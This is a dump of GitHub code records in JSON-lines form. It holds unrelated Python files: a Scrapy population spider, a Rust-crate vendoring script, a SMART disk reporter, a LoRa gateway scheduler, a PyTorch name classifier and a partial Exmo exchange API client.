0 else None\n )\n","repo_name":"frake23/moodle-analyzer","sub_path":"server/app/routers/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4038560460","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport logging\n#from scrapy.shell import inspect_response\n#from scrapy.urils.response import open_in_browser\n\n\nclass CountriesSpider(scrapy.Spider):\n name = 'countries'\n allowed_domains = ['www.worldometers.info']\n start_urls = [\n 'https://www.worldometers.info/world-population/population-by-country/']\n #country_name = ''\n\n def parse(self, response):\n countries = response.xpath(\"//td/a\")\n\n for country in countries:\n name = country.xpath(\".//text()\").get()\n # self.country_name = name\n link = country.xpath(\".//@href\").get()\n\n # absoulute_url = f\"https://www.worldometers.info{link}\"\n # absoulute_url = response.urljoin(link)\n\n # yield scrapy.Request(url=absoulute_url)\n # callback 추가 시 , 크롤링 후 callback 실행\n # meta 추가 시, callback에 전달됨.\n yield response.follow(url=link, callback=self.parse_country, meta={'country_name': name})\n\n def parse_country(self, response):\n # inspect_response(response, self) # debugging\n # open_in_brower(response)\n # loggin.warning(response.status)\n name = response.request.meta['country_name']\n rows = response.xpath(\n \"(//table[@class='table table-striped table-bordered table-hover table-condensed table-list'])[1]/tbody/tr\")\n for row in rows:\n year = row.xpath(\".//td[1]/text()\").get()\n population = row.xpath(\".//td[2]/strong/text()\").get()\n yield {\n # 'name': self.country_name,\n 'country_name': name,\n 'year': year,\n 'population': population\n }\n\n# DataSet 출력하기\n# scrapy crawl countries -o population_dataset.json\n# scrapy crawl countries -o population_dataset.csv\n","repo_name":"jinkstudy/crawling_scrapy","sub_path":"worldometers/worldometers/spiders/countries.py","file_name":"countries.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19777884959","text":"#!/usr/bin/python3\n\"\"\"Vendor PyCA cryptography's Rust crates\n\"\"\"\nimport argparse\nimport os\nimport re\nimport tarfile\nimport tempfile\nimport shutil\nimport subprocess\nimport sys\n\nVENDOR_DIR = \"vendor\"\nCARGO_TOML = \"src/rust/Cargo.toml\"\nRE_VERSION = re.compile(\"Version:\\s*(.*)\")\n\nparser = argparse.ArgumentParser(description=\"Vendor Rust packages\")\nparser.add_argument(\n \"--spec\", default=\"python-cryptography.spec\", help=\"cryptography source tar bundle\"\n)\n\n\ndef cargo(cmd, manifest):\n args = [\"cargo\", cmd, f\"--manifest-path={manifest}\"]\n return subprocess.check_call(\n args, stdout=subprocess.DEVNULL, stderr=sys.stderr, env={}\n )\n\n\ndef tar_reset(tarinfo):\n \"\"\"Reset user, group, mtime, and mode to create reproducible tar\"\"\"\n tarinfo.uid = 0\n tarinfo.gid = 0\n tarinfo.uname = \"root\"\n tarinfo.gname = \"root\"\n tarinfo.mtime = 0\n if tarinfo.type == tarfile.DIRTYPE:\n tarinfo.mode = 0o755\n else:\n tarinfo.mode = 0o644\n if tarinfo.pax_headers:\n raise ValueError(tarinfo.name, tarinfo.pax_headers)\n return tarinfo\n\n\ndef tar_reproducible(tar, basedir):\n \"\"\"Create reproducible tar file\"\"\"\n\n content = [basedir]\n for root, dirs, files in os.walk(basedir):\n for directory in dirs:\n content.append(os.path.join(root, directory))\n for filename in files:\n content.append(os.path.join(root, filename))\n content.sort()\n\n for fn in content:\n tar.add(fn, filter=tar_reset, recursive=False, arcname=fn)\n\n\ndef main():\n args = parser.parse_args()\n spec = args.spec\n\n # change cwd to work in bundle directory\n here = os.path.dirname(os.path.abspath(spec))\n os.chdir(here)\n\n # extract version number from bundle name\n with open(spec) as f:\n for line in f:\n mo = RE_VERSION.search(line)\n if mo is not None:\n version = mo.group(1)\n break\n else:\n raise ValueError(f\"Cannot find version in {spec}\")\n\n bundle_file = f\"cryptography-{version}.tar.gz\"\n vendor_file = f\"cryptography-{version}-vendor.tar.gz\"\n\n # remove existing vendor directory and file\n if os.path.isdir(VENDOR_DIR):\n shutil.rmtree(VENDOR_DIR)\n try:\n os.unlink(vendor_file)\n except FileNotFoundError:\n pass\n\n print(f\"Getting crates for {bundle_file}\", file=sys.stderr)\n\n # extract tar file in tempdir\n # fetch and vendor Rust crates\n with tempfile.TemporaryDirectory(dir=here) as tmp:\n with tarfile.open(bundle_file) as tar:\n tar.extractall(path=tmp)\n manifest = os.path.join(tmp, f\"cryptography-{version}\", CARGO_TOML)\n cargo(\"fetch\", manifest)\n cargo(\"vendor\", manifest)\n\n print(\"\\nCreating tar ball...\", file=sys.stderr)\n with tarfile.open(vendor_file, \"x:gz\") as tar:\n tar_reproducible(tar, VENDOR_DIR)\n\n # remove vendor dir\n shutil.rmtree(VENDOR_DIR)\n\n parser.exit(0, f\"Created {vendor_file}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"theforeman/pulpcore-packaging","sub_path":"packages/python-cryptography/vendor_rust.py","file_name":"vendor_rust.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24867362267","text":"#!/usr/bin/env python2.7\nimport os\nimport re\nfrom subprocess import check_output, check_call, CalledProcessError\n\nINFO_FIELD_MAP = {\n 'model_family': 'family',\n 'device_model': 'model',\n 'lu_wwn_device_id': 'wwn',\n 'user_capacity': 'capacity',\n 'serial_number': 'serial',\n 'firmware_version': 'firmware',\n}\n\ntry:\n with open(os.devnull, 'w') as devnull:\n check_call(['which', 'smartctl'], stdout=devnull, stderr=devnull)\n\n try:\n i = 0\n attr_i = 0\n\n for devline in check_output(['smartctl', '--scan']).split(\"\\n\"):\n try:\n parts = re.split(r'\\s+', devline.strip())\n\n if len(parts):\n device = parts[0]\n devtype = None\n\n if len(parts) >= 3:\n devtype = parts[2]\n\n with open(os.devnull, 'w') as devnull:\n smartout = check_output([\n 'smartctl', '-i', '-A', device,\n ], stderr=devnull).split(\"\\n\")\n\n print(\"disk.smart.{}.device:str:{}\".format(i, device))\n\n if devtype:\n print(\"disk.smart.{}.device_type:str:{}\".format(i, devtype))\n\n in_section_info = False\n in_section_data = False\n\n for line in smartout:\n try:\n if 'INFORMATION SECTION' in line.upper():\n in_section_info = True\n in_section_data = False\n\n elif 'DATA SECTION' in line.upper():\n in_section_info = False\n in_section_data = True\n\n elif in_section_info:\n field, value = re.split(r':\\s+', line.strip(), 1)\n field = re.sub(r'\\s+', '_', field.lower())\n value = value.strip()\n dtype = 'str'\n\n if field == 'user_capacity':\n value = re.sub(r'\\s+bytes.*$', '', value)\n value = int(value.replace(',', ''))\n dtype = 'int'\n\n elif field == 'lu_wwn_device_id':\n value = re.sub(r'\\s+', '', value)\n\n if field in INFO_FIELD_MAP:\n key = INFO_FIELD_MAP[field]\n\n print(\"disk.smart.{}.{}:{}:{}\".format(i, key, dtype, value))\n\n elif in_section_data and re.match(r'^\\s*\\d+\\s', line):\n attr_id, attr_name, flag, value, worst, threshold, attr_type, updated, \\\n when_failed, raw = re.split(r'\\s+', line.strip(), 9)\n\n attr_name = attr_name.lower()\n attr_type = attr_type.lower()\n updated = updated.lower()\n\n if when_failed == '-':\n when_failed = None\n\n print(\"disk.smart.{}.attributes.{}.id:str:attr-{}\".format(i, attr_i, attr_id))\n print(\"disk.smart.{}.attributes.{}.name:str:{}\".format(i, attr_i, attr_name))\n print(\"disk.smart.{}.attributes.{}.flag:int:{}\".format(i, attr_i, int(flag, 16)))\n print(\"disk.smart.{}.attributes.{}.value:int:{}\".format(i, attr_i, int(value)))\n print(\"disk.smart.{}.attributes.{}.raw_value:int:{}\".format(i, attr_i, int(raw)))\n print(\"disk.smart.{}.attributes.{}.worst:int:{}\".format(i, attr_i, int(worst)))\n print(\"disk.smart.{}.attributes.{}.threshold:int:{}\".format(i, attr_i, int(threshold)))\n print(\"disk.smart.{}.attributes.{}.type:str:{}\".format(i, attr_i, attr_type))\n print(\"disk.smart.{}.attributes.{}.update_freq:str:{}\".format(i, attr_i, updated))\n\n if when_failed:\n print(\"disk.smart.{}.attributes.{}.when_failed:str:{}\".format(i, attr_i, when_failed))\n\n attr_i += 1\n\n except:\n continue\n\n i += 1\n\n except:\n continue\n\n except:\n pass\n\nexcept CalledProcessError:\n os.exit(0)\n","repo_name":"ghetzel/sysfact","sub_path":"shell.d/smart.py","file_name":"smart.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565605314","text":"from functools import reduce\n\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n \n list_of_subarry = []\n \n for i in range(len(nums)):\n \n for j in range(i, len(nums)):\n \n sub_array = nums[i:j+1]\n if reduce( operator.mul, sub_array, 1 ) < k:\n list_of_subarry.append( sub_array )\n \n \n return len(list_of_subarry)","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0713_Subarray Product Less Than K/subarray_product_less_than_k_by_naive_Time Limit Exceed.py","file_name":"subarray_product_less_than_k_by_naive_Time Limit Exceed.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"1538740767","text":"#_*_coding:utf-8_*_\nimport os.path,glob,os\nimport numpy as np\nfrom PIL import Image\n\ndef make_rp(i):\n im = np.array(Image.open(i).convert(\"L\"))\n a = np.asarray(im).astype('float')\n vec_el = np.pi / 2.2 # 光源的俯视角度,弧度值\n vec_az = np.pi / 4 # 光源的方位角度,弧度值\n depth = 10.\n grad = np.gradient(a) # 取图像灰度的梯度值\n grad_x, grad_y = grad # 分别取横纵图像梯度值\n grad_x = grad_x * depth / 100.\n grad_y = grad_y * depth / 100.\n dx = np.cos(vec_el) * np.cos(vec_az) # 光源对X轴的影响\n dy = np.cos(vec_el) * np.sin(vec_az) # 光源对Y轴的影响\n dz = np.sin(vec_el) # 光源对Z轴的影响\n A = np.sqrt(grad_x ** 2 + grad_y ** 2 + 1.)\n uni_x = grad_x / A\n uni_y = grad_y / A\n uni_z = 1. / A\n a1 = 255 * (dx * uni_x + dy * uni_y + dz * uni_z) # 光源归一化\n a1 = a1.clip(0, 255)\n im1 = Image.fromarray(a1.astype('uint8')) # 重构图像\n return im1\n\ndef make_p(i):\n print('共' + str(s) + '张,现在是第' + str(k) + '张')\n out = 'py_' + os.path.basename(i)\n make_rp(i).save(ps_out+out)\n\ndef face():\n pf = str(input('输入文件夹路径:(-1结束)'))\n if pf == '-1':\n return '-1'\n return pf\n\n\nif __name__ == '__main__':\n pf = '1'\n while pf != '-1':\n pf = face()\n if pf=='-1':\n break\n if os.path.exists(pf):\n if pf[-1] != '\\\\':\n pf = pf + '\\\\'\n pfs = glob.glob(pf + '*.jpg') + glob.glob(pf + '*.png') + glob.glob(pf + '*.gif') + glob.glob(pf + '*.jpeg')\n ps_out = pf + 'py_out\\\\'\n s = len(pfs)\n k = 1\n if not os.path.exists(ps_out):\n os.mkdir(ps_out)\n for i in pfs:\n make_p(i)\n k += 1\n print('-' * 20 + '完成(from 杜章定1163829941)')\n else:\n print('文件夹不存在!!')\n","repo_name":"DLABDE/weather_cube","sub_path":"pic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72905982913","text":"# implementation of Light algorithm (gateway side)\n# \"Offline scheduling algorithms for time-slotted lora-based bulk data transmission\"\n# author: Dimitris Zorbas (dimzorbas@ieee.org)\n#\n# Distributed under GNU GPLv3\n\nimport socket\nimport struct\nfrom network import LoRa\nfrom network import WLAN\nimport ubinascii\nimport pycom\nimport time\nimport uos\nfrom machine import Timer\nimport math\n\npycom.heartbeat(False)\noff = 0x000000\nred = 0x7f0000\ngreen = 0x007f00\nblue = 0x00007f\nwhite = 0xFFFAFA\n\nwlan = WLAN(mode=WLAN.STA)\nif not wlan.isconnected():\n wlan.connect('ssid', auth=(WLAN.WPA2, 'password'), timeout=5000)\n while not wlan.isconnected():\n machine.idle()\n\nprint (ubinascii.hexlify(wlan.mac(),':').decode())\nprint(\"I got IP\"+wlan.ifconfig()[0])\n\n_LORA_PKG_FORMAT = \"!BB%ds\"\n_LORA_INIT_FORMAT = \"!BBs\"\n_LORA_RCV_PKG_FORMAT = \"!BB%ds\"\nMY_ID = 0x01\nmy_sf = int(MY_ID) + 6\nmy_bw_index = 2\n(guard, sync_method, sync_rate) = (40, 1, 1)\nfreqs = [865000000, 865600000, 866200000, 866800000, 867400000, 868000000] # my channels\nairtime = [[0.174336, 0.087168, 0.043584], [0.307712, 0.153856, 0.076928], [0.553984, 0.276992, 0.138496], [1.026048, 0.513024, 0.256512], [2.215936, 0.944128, 0.472064], [3.940352, 1.724416, 0.862208]]\nif (my_bw_index == 0):\n my_bw = LoRa.BW_125KHZ\nelif (my_bw_index == 1):\n\tmy_bw = LoRa.BW_250KHZ\nelif (my_bw_index == 2):\n my_bw = LoRa.BW_500KHZ\nmy_node_list = [11, 12, 13, 14, 15, 16, 17, 18, 19, 20] # my node ids\n\nwhile (True):\n # connect to the network server via wifi and receive the schedule\n pycom.rgbled(green)\n host = '192.168.0.'+str(int(MY_ID))\n port = 8000\n wlan_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"socket created\")\n wlan_s.bind((host, port))\n wlan_s.listen(5)\n conn, addr = wlan_s.accept()\n print('Got connection from', addr)\n data = conn.recv(512)\n data = str(data)[2:]\n data = data[:-1]\n if (len(data) > 30): # get some info + the schedule\n (guard, sync_method, sync_rate, data) = str(data).split(\":\")\n data = str(guard)+\":\"+str(sync_rate)+\":\"+str(data) # send in sting mode (I'll change this later)\n print(data)\n wlan_s.close()\n guard = int(guard)\n sync_method = int(sync_method)\n sync_rate = int(sync_rate)\n airt = airtime[my_sf-7][my_bw_index]*1000\n round_length = int(math.ceil(100*airt/(airt + 2*guard))*(airt + 2*guard))\n print(\"round length =\", round_length)\n\n # send the schedule to the nodes (let's use SF12)\n print(\"start with lora...\")\n lora = LoRa(mode=LoRa.LORA, tx_iq=True, frequency=freqs[0], region=LoRa.EU868, power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=12, tx_power=14)\n lora_sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n lora_sock.setblocking(False)\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n print(pkg)\n while (lora.ischannel_free(-100) == False):\n time.sleep_ms(100)\n lora_sock.send(pkg)\n print(\"schedule sent!\")\n time.sleep(1)\n while (lora.ischannel_free(-100) == False):\n time.sleep_ms(100)\n data = \"init\"\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n lora_sock.send(pkg)\n print(\"Init command sent!\")\n my_data = list()\n time.sleep_ms(207) # propagation time of init with SF12\n chrono = Timer.Chrono()\n chrono.start()\n start = chrono.read_ms()\n finish = start\n i = 1\n while ((finish - start) < (round_length*102 + 100*(3*guard + 50)/sync_rate)): # data collection time + some extra\n pycom.rgbled(red)\n round_start = chrono.read_ms()\n print(i, \"----------------------------------------------------\")\n print(\"started new round at:\", round_start)\n lora.init(mode=LoRa.LORA, rx_iq=True, region=LoRa.EU868, frequency=freqs[my_sf-7], power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=my_sf)\n print(\"started receiving at:\", chrono.read_ms())\n while ((chrono.read_ms() - round_start) < (round_length)):\n recv_pkg = lora_sock.recv(8192)\n if (len(recv_pkg) > 2):\n recv_pkg_len = recv_pkg[1]\n recv_pkg_id = recv_pkg[0]\n if (int(recv_pkg_id) <= 20) and (int(recv_pkg_len) == 98):\n dev_id, leng, msg = struct.unpack(_LORA_RCV_PKG_FORMAT % recv_pkg_len, recv_pkg)\n print('Device: %d - Pkg: %s' % (dev_id, msg))\n if (str(msg) == \"b'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\"): # format check\n msg = int(dev_id)\n my_data.append(msg)\n\n if (i % sync_rate == 0): # synchronisation\n sync_slot = 100 # I have to fix this\n sync_start = chrono.read_ms()\n print(\"entered sync at:\", sync_start)\n pycom.rgbled(white)\n time.sleep_ms(2*guard) # let's make it long so all the nodes are up\n lora.init(mode=LoRa.LORA, tx_iq=True, frequency=freqs[my_sf-7], region=LoRa.EU868, power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=my_sf, tx_power=14)\n if (sync_method == 1): # 1st sync method\n data = int(chrono.read_ms())\n data = str(data)\n else: # 2nd sync method\n data = \"sync\"\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n while (lora.ischannel_free(-100) == False): # precision killer\n print(\"act on channel!\")\n time.sleep_ms(100)\n if (sync_method == 1):\n data = int(chrono.read_ms())\n data = str(data)\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n lora_sock.send(pkg)\n print(\"Sent sync: \"+data)\n time.sleep_ms(guard)\n print(\"sync lasted:\", abs(time.ticks_diff(int(chrono.read_ms()), int(sync_start))), \"ms\")\n\n finish = chrono.read_ms()\n print(\"round lasted:\", abs(time.ticks_diff(int(finish), int(round_start))), \"ms\")\n i += 1\n\n time.sleep(1)\n pycom.rgbled(green)\n occur = {}\n stats = []\n for n in my_node_list:\n occur[n] = 0\n for n in my_data:\n occur[n] += 1\n for n in sorted(occur.keys()):\n print(\"%s: %s\" % (n, occur[n]))\n stats.append(occur[n])\n print(str(stats))\n # send data to network server\n wlan_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n wlan_s.connect(('192.168.0.254', 8000))\n wlan_s.send(str(stats))\n wlan_s.close()\n print(\"data was sent to network server!\")\n pycom.rgbled(off)\n time.sleep(10)\n","repo_name":"deltazita/offline-lora","sub_path":"pycom_implementations/light_gw.py","file_name":"light_gw.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22868880637","text":"from basic_imports import *\nfrom torch_imports import *\nimport glob\nimport unicodedata\nimport string\n\nclass Config:\n datadir = 'data/names/*.txt'\n batch_size = 16\n hidden_dim = 128\n lr = 0.03\n device = 'cuda:1'\n num_layers = 1\n num_epochs = 7\n \n\ndef findFiles(path): return glob.glob(path)\n\n\n# Turn a Unicode string to plain ASCII, thanks to https://stackoverflow.com/a/518232/2809427\ndef unicodeToAscii(s, all_letters):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n and c in all_letters\n )\n\n# Read a file and split into lines\ndef readLines(filename, all_letters):\n lines = open(filename, encoding='utf-8').read().strip().split('\\n')\n return [unicodeToAscii(line, all_letters) for line in lines]\n\n# Find letter index from all_letters, e.g. \"a\" = 0\ndef letterToIndex(letter, all_letters):\n return all_letters.find(letter)\n\ndef lineToTensor(lines, all_letters):\n word_list = []\n for word in lines:\n letter_list = []\n for l in word:\n letter_list.append(letterToIndex(l, all_letters))\n word_list.append(letter_list)\n return np.array(word_list)\n\n\ndef collate_fn(batch):\n x, y = zip(*batch)\n lens = np.array([len(o) for o in x])\n max_len = max(lens)\n seq_lens_idx = np.argsort(lens)[::-1]\n lens = torch.Tensor(lens[seq_lens_idx]).long()\n x = [x[i] for i in seq_lens_idx]\n tensor_y = torch.Tensor([y[i] for i in seq_lens_idx]).long()\n tensor_x = torch.zeros( len(x), max_len, n_letters) \n for wi, word in enumerate(x):\n for li, letter in enumerate(word):\n tensor_x[wi][li][letter] = 1\n \n return tensor_x, lens, tensor_y\n\nclass NameDataset(Dataset):\n def __init__(self, X, y):\n self.X = X\n self.y = y\n \n def __getitem__(self, i):\n return self.X[i], self.y[i]\n \n def __len__(self): return len(self.y)\n\n \n\n\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers, output_size, model_type):\n super().__init__()\n if model_type == 'rnn':\n self.model = nn.RNN\n elif model_type == 'lstm':\n self.model = nn.LSTM\n elif model_type == 'gru':\n self.model = nn.GRU\n self.rnn = self.model(input_size=input_size, hidden_size=hidden_size, num_layers=num_layers, batch_first=True)\n self.fc = nn.Linear(hidden_size, output_size)\n self.model_type = model_type\n \n def forward(self, inputs):\n x, seq_lens = inputs\n ## TODO: need to unpack?\n x_pack = nn.utils.rnn.pack_padded_sequence(x, seq_lens, batch_first=True)\n if self.model_type == 'rnn' or self.model_type == 'gru':\n y_pack, hn = self.rnn(x_pack)\n elif self.model_type == 'lstm':\n y_pack, (hn, _) = self.rnn(x_pack)\n y, _ = nn.utils.rnn.pad_packed_sequence(y_pack, batch_first=True)\n y_last = torch.stack([y[i,seq_lens[i]-1,:] for i in range(len(x))])\n output = self.fc(y_last)\n return output\n \n\n\ndef train(model, dl, optimizer, criterion, num_instances, config, train=True):\n if train:\n model.train()\n else:\n model.eval()\n loss, acc = 0, 0\n \n for X, seq_lens, y in dl:\n X = X.to(config.device)\n seq_lens = seq_lens.to(config.device)\n labels = y.to(config.device)\n optimizer.zero_grad()\n \n with torch.set_grad_enabled(train):\n outputs = model( (X, seq_lens) )\n preds = outputs.argmax(dim=1)\n l = criterion(outputs, labels)\n if train:\n l.backward()\n optimizer.step()\n loss += l.item()\n acc += torch.sum(preds == labels).item()\n loss /= len(dl)\n acc /= num_instances\n return loss, acc\n\ndef fit(ds_trn, ds_val, dl_trn, dl_val, model, criterion, config):\n optimizer = torch.optim.SGD(model.parameters(), lr=config.lr)\n best_acc = 0\n trn_losses, val_losses, val_accs = [], [], []\n for epoch in range(config.num_epochs):\n # train\n trn_loss, trn_acc = train(model, dl_trn, optimizer, criterion, len(ds_trn), config, train=True)\n # val\n val_loss, val_acc = train(model, dl_val, optimizer, criterion, len(ds_val), config, train=False)\n trn_losses.append(trn_loss)\n val_losses.append(val_loss)\n val_accs.append(val_acc)\n if val_acc > best_acc:\n best_acc = val_acc\n best_weights = model.state_dict()\n best_epoch = epoch\n print(f'Epoch {epoch}/{config.num_epochs - 1}, trn_loss {trn_loss} val_loss {val_loss} val_acc {val_acc}')\n return best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs]\n\n\ndef main():\n global n_letters\n config = Config()\n all_letters = string.ascii_letters + \" .,;'\"\n n_letters = len(all_letters)\n \n # Build the category_lines dictionary, a list of names per language\n category_lines = {}\n all_categories = []\n\n for filename in findFiles(config.datadir):\n category = os.path.splitext(os.path.basename(filename))[0]\n all_categories.append(category)\n lines = readLines(filename, all_letters)\n category_lines[category] = lines\n n_categories = len(category_lines.keys())\n\n max_len = max([len(o) for k in category_lines.keys() for o in category_lines[k]])\n trn_xs, trn_ys, val_xs, val_ys = [], [], [], []\n\n for k in category_lines.keys():\n names = category_lines[k]\n x = lineToTensor(names, all_letters)\n idx = np.arange(len(names))\n y = np.array([all_categories.index(k) for _ in range(len(names))])\n ## train and tst\n trn_idx, tst_idx = np.split(idx, [int(len(names)*0.8)])\n trn_x, trn_y, val_x, val_y = x[trn_idx], y[trn_idx], x[tst_idx], y[tst_idx]\n\n ## merge\n trn_xs += list(trn_x)\n trn_ys.append(trn_y)\n val_xs += list(val_x)\n val_ys.append(val_y)\n trn_ys = np.concatenate(trn_ys)\n val_ys = np.concatenate(val_ys)\n \n ds_trn = NameDataset(trn_xs, trn_ys)\n ds_val = NameDataset(val_xs, val_ys)\n dl_trn = DataLoader(ds_trn, batch_size=config.batch_size, collate_fn=collate_fn, shuffle=True)\n dl_val = DataLoader(ds_val, batch_size=config.batch_size, collate_fn=collate_fn, shuffle=True)\n \n criterion = nn.CrossEntropyLoss()\n model = RNN(n_letters, config.hidden_dim, config.num_layers, n_categories, 'lstm')\n model = model.to(config.device)\n best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs] = fit(ds_trn, ds_val, dl_trn, dl_val, model, criterion, config)\n return best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs]\n\nif __name__ == '__main__':\n best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs] = main()\n print(f\"Best accuracy of current configuration is: {best_acc}\")","repo_name":"Emrys-Hong/SUTD-deep-learning-homework","sub_path":"deep-learning/coding-wk8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13516229454","text":"#Administração de Sistemas Informáticos, Exemplos Básicos\n#Pedro \"pedroma2000\" Machado\n\nimport re\n\nstr = \"8180238;Pedro Machado;M;21;912345678\"\n\npattern = re.compile(r'^(?P.*);(?P\\d{9}$)')\n\nif pattern.match(str):\n print(\"Match\")\n print(pattern.sub(r\"\\g;00351\\g\", str))\n\nelse:\n print(\"Doesn't match\")","repo_name":"pedroma2000/ASI","sub_path":"Exemplos/Backtrack/Example_2.py","file_name":"Example_2.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22431279380","text":"import ssl\r\nimport time\r\nimport json\r\nimport urllib\r\nimport hmac, hashlib\r\nfrom urllib import response\r\nimport requests\r\nfrom urllib.parse import urlparse, urlencode\r\nfrom urllib.request import Request, urlopen\r\n\r\n\r\nclass Exmo():\r\n\r\n def __init__(self, API_KEY, API_SECRET):\r\n self.API_KEY = API_KEY\r\n self.API_SECRET = bytes(API_SECRET, encoding='utf-8')\r\n\r\n def _sign(self, payload):\r\n \r\n payload = urlencode(payload)\r\n\r\n H = hmac.new(key = self.API_SECRET, digestmod=hashlib.sha512)\r\n\r\n H.update(payload.encode('utf-8'))\r\n\r\n sign = H.hexdigest()\r\n\r\n return sign\r\n\r\n def trades(self, base, quote) -> dict:\r\n '''\r\n Возвращает список последних сделок по текущей паре\r\n\r\n пример trades('btc', 'usd') -> вернёт список последних сделок по паре BTC/USD\r\n '''\r\n url = \"https://api.exmo.com/v1.1/trades\"\r\n\r\n \r\n payload = dict(\r\n pair = f'{base.upper()}_{quote.upper()}'\r\n )\r\n \r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n \r\n def order_book (self, base, quote, limit = 100) -> dict:\r\n '''\r\n Возвращает список текущих ордеров по конкретной паре\r\n\r\n пример order_book('BTC','USD',100) -> вернет книгу ордеров на глубину 100\r\n '''\r\n url = \"https://api.exmo.com/v1.1/order_book\"\r\n\r\n payload = dict(\r\n pair = f'{base.upper()}_{quote.upper()}',\r\n limit = f'{str(limit)}'\r\n )\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def tiker (self) -> dict:\r\n '''\r\n Метод возвращает статистику по всем текущим парам\r\n '''\r\n url = \"https://api.exmo.com/v1.1/ticker\"\r\n\r\n payload = {}\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n \r\n def pair_settings(self) -> dict:\r\n '''\r\n Возвращает настройки торговых пар\r\n '''\r\n url = \"https://api.exmo.com/v1.1/pair_settings\"\r\n\r\n payload={}\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def currency (self) -> dict:\r\n '''\r\n Возвращает список доступных активов на бирже\r\n '''\r\n url = \"https://api.exmo.com/v1.1/currency\"\r\n\r\n payload={}\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def _currency (self) -> dict:\r\n '''\r\n Возврат раширенного списка активов\r\n '''\r\n url = \"https://api.exmo.com/v1.1/currency/list/extended\"\r\n\r\n payload={}\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"GET\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def required_amount (self, base, quote, quantity) -> dict:\r\n '''\r\n Вернёт расчет суммы покупки определенного количества валюты для конкретной валютной пары\r\n '''\r\n url = \"https://api.exmo.com/v1.1/required_amount\"\r\n\r\n payload= dict(\r\n pair = f'{base.upper()}_{quote.upper()}',\r\n quantity = f'{quantity}'\r\n )\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def candles_history(self, base, quote, resolution, limit) -> dict:\r\n '''\r\n Возвращает данные о свечах в данной торговой паре\r\n\r\n варианты resolution : {\r\n 1 = 1 minute,\r\n 5 = 5 minute,\r\n 15 = 15 minute,\r\n 30 = 30 minute,\r\n 45 = 45 minute,\r\n 60 = 60 minute,\r\n 120 = 120 minute,\r\n 180 = 180 minute,\r\n 240 = 240 minute\r\n 1440 = 1 day,\r\n 10080 = 1 week\r\n }\r\n\r\n limit - количество свечей от текущей\r\n '''\r\n \r\n end = int(time.time())\r\n start = end - int(resolution)*60*int(limit)\r\n\r\n if resolution == 1440:\r\n resolution = 'D'\r\n if resolution == 10080:\r\n resolution = 'W'\r\n \r\n url = f'https://api.exmo.com/v1.1/candles_history?symbol={base.upper()}_{quote.upper()}&resolution={str(resolution)}&from={str(start)}&to={str(end)}'\r\n\r\n payload = {}\r\n\r\n headers = {}\r\n \r\n response = requests.request('GET', url, 